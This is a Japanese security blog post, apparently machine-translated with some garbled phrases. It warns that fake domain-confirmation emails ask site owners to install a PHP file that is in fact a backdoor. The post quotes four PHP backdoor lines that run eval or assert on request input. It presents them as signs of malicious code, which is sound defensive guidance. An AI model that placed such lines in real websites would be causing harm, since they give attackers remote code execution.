それらの偽のドメイン確認メールを信用しないでください

English version: Do not trust those fake domain confirmation emails

最近、私のクライアントの何人かは、ドメインレジストラから奇妙な電子メールの手紙を受け取りました。これらの手紙には、独自の確認ドメインの要求が含まれています。私はそれらの手紙の1つをチェックし、すぐにそれを不正な手紙として特定しました。すべての文字は同じパターンで、特定の名前と指定されたコンテンツを使用してWebサイトのルートフォルダーにPHPファイルを作成するように要求されます。言うまでもなく、そのPHPファイルの推奨コンテンツには、バックドアコードと呼ばれる悪意のあるコードが含まれています。この種のコードにより、攻撃者は被害者のWebサイトで必要なアクションを実行できます。

WebサイトにPHPコードを作成、ダウンロード、またはインストールするように要求する手紙を受け取った場合は、それを無視する必要があります。例外なく。たとえその手紙が大統領やあなたのお母さんから来たとしても。

不正な手紙は、正当な差出人の電子メールアドレスのために正当に見えます。しかし、それは電子メールのなりすましです。友達やドメイン登録事業者から偽のメールを受け取ることは期待していません。右？番号！すべての電子メールレターには、任意の差出人電子メールアドレスを含めることができます。電子メールサーバーと電子メールクライアントの大多数は、送信者アドレスをチェックまたは検証しません。だから、あなたはそれをハッカーが望んでいたように見ます。 Webサイトへのコードのインストールやコンピューターへのアプリケーションのインストールなど、疑わしいアクションの要求がレターに含まれている場合は、既知の送信者から受信した電子メールレターを信頼してはなりません。

技術的な詳細

偽の電子メールには通常、次のPHP行の一部が含まれています。

assert(stripslashes($_REQUEST['something']));

eval(stripslashes($_REQUEST['something']));

assert(base64_decode($_REQUEST['something']));

eval(base64_decode($_REQUEST['something']));

参考：base64_decode、eval、assertは、疑わしいまたは悪意のあるPHPコードのよく知られたマーカーです。

参照：プラグインインスペクターが他のプラグインのセキュリティ問題を明らかにする